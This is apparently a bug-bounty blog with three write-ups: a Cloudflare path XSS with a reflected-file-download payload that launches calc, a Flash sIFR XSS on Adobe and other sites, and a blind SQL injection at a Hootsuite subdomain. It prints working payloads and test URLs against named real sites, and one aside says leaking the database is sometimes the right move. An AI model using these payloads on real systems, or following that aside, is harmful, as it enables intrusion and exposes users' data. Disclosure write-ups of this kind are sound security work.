Monday, November 16, 2015

Cloudflare - when the firewall fall in protect it self

Hi ,

From along time ago  , I found a bug in http://securityundefined.com of xss vuln in the path


I reported it and got fixed after while 

the vulnerable parameter was (r[])  , but I did not know that the path  (/cdn-cgi/pe/bag2?r[]=) is for cloudflare so I did not look for 

After that I was searching in some bug bounty and get  


I was surprised for see this path again I was saying maybe it is vulnerable like the previews one . 

 So I did simple GET request

GET /cdn-cgi/pe/bag2?r= HTTP/1.1
Host: xxxxxxxxxxxxxxxx.foo

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I got 

HTTP/1.1 405 Not Allowed
Date: Mon, 16 Nov 2015 16:17:42 GMT
Content-Type: text/html
Server: cloudflare-nginx
cf-ray: 246481f1dd7c08ea-CDG
Transfer-Encoding: chunked
Connection: Keep-Alive

 What ?!! the website is not for cloudflare ? why the respond
server is cloudflare ?
 I understand that it use cloudfalre services 

But how it is work ? and why I get (405 Not Allowed) in respond , and I want a (200 OK !) 

I used proxy to get clear HTTP request that get the 200 OK . 

/cdn-cgi/pe/bag2?r[]=http://foo.bar/xxx.js HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

I saw the (PE-Token) in the request and I cahnged the (http://foo.bar/xxx.js) to (<script>alert(1)</script>)

Firefox : nothing ! 
IE 9,10,11 : the XSS works !!

after some looking the context type was set to (
Content-Type: multipart/mixed)
for that IE read as HTML page and js works . 

But here is problem where can I have (PE-Token) ??
Solve : when you do (
405 Not Allowed) you will get a simple page .

if you view the source code  you will see a

<head><title>405 Not Allowed</title><script type="text/javascript">
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:1438806465,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"xxxxxxxxxxx",petok:"1181d2a8d2f71217d89f9a70eb521bd7334e1a25-1438819567-1800",betok:"6ac82112672bec8b142092f8509e441fc0771df0-1438819567-120",zone:"salesforce.com",rocket:"0",apps:{"clky":{"sid":"xxxx","uid":"xxxx"}}}];!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=d134393e0a/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>

The  petok = PE-Token 

Now we can make a poc  , if we have good crossdomain policy allow to do cross rqesut 
 I did not get a website a like so it was just scenario 

I see that many websites use the service from cloudflare 

here is some of it and with XSS 

 There are many more .

And you can use it as RFD :

GET /cdn-cgi/pe/bag2;/update.bat?r[]=%22FOO:BAR\%22||calc||%22

I reported it to cloudfalre they marked as N/A but they fixed anyway . 

Done !! 

Monday, August 3, 2015

One payload to XSS them all !

Hi ,

Today I want to share my find in 2013 which is XSS in flash file was used in many websites (famous websites !).
the flash file was called sIFR (Scalable_Inman_Flash_Replacement)

Q: How I found it ?

A: Till today I was thinking that I am the first one who reported this issue in fact it is an old bug
That have CVE (Read more)

So let's talk about what I found , I was looking for bug in Adobe my exploire get me to

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=ADOBE PHOTOSHOP CS3&textcolor=

 The (txt) was get simple text
 The (textcolor) was get a HTML color code 


the page Show XSS  and when I make the payload 

Immm good the txt parameter show our text let's do HTML things .

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=<a href="javascript:alert('Xssed by Abdullah Hussam')">xss</a>

It is work !!! and I found XSS on Adobe . But I notice something in URL

http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=ADOBE PHOTOSHOP CS3&textcolor=
 It is look like path of file in (www.adobe.com) ,so I deleted the (wwwimages.adobe.com/) from URL 

and go to :

https://www.adobe.com/lib/com.adobe/sIFR2.0.2/myriad.swf?txt=<a href="javascript:alert('Xssed by Abdullah Hussam')">xss</a>

Xss show in the page I click on it and booom !

Please bear with me that I inject my name in code it was my start at bug bounty hhhhh :) .

So it was very good

Now I was think that (sIFR2.0.2) is Adobe product that I can found in other website

I make Dork to find others

there were too many website wait the surprise it was big one

Visa,AMEX,Blackberry,Stanford,Haravrd,and many Gov sites

Here is a samples :

The PoC video : 

There are many others websites vulnerable .

Thanks for read .

Useful links : 

Saturday, August 1, 2015

Blind SQL inejction [Hootsuite]

Hi , I will start publish some of my findings

In 2014 I found Blind SQL injection at hootsuite subdomain (https://learn.hootsuite.com)

Blind SQL Injection :
 Is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection 

When I signup for new account and explore the site , I saw the photos of users connected to php file to show as profile image .

I copy the link and go to it


it was good and the photo was  viewed well

Let's do magic things


the page was white totally white !!

this is look like SQLi I do many test and find out that it is blind sql injection

for example you can do simple test

1- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=1 

OK !!

2- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=2 

Error !! 

I did not have much experience in sqli that time so I used SQLMAP to make sure that it is blind or not .

Type: boolean-based blind ; 
Database :hootsuite_u_v2

So  I was right.

I made report and send with all info and details.

I got

 I was surprised that a security team  dose not know what is sql injection I sent file,parameter,payload,and type .

After many messages and replies they fixed the sqli in months and block me I think !! because they tell me the will see if they can add me in hall of fame . I waited and nothing did try to contact them but no replay so I left them .

Sometimes you should do bad things like leak the DB !!! .
There were 10k users or 100k I do not remember .
That is all about .

Thanks for read .

 Useful links :
1- https://www.owasp.org/index.php/Blind_SQL_Injection
2- https://en.wikipedia.org/wiki/SQL_injection 
3- https://www.acunetix.com/websitesecurity/blind-sql-injection/
4- https://hackerone.com/reports/21899
5- There are many cool articles and writes-up about SQLi you can look for.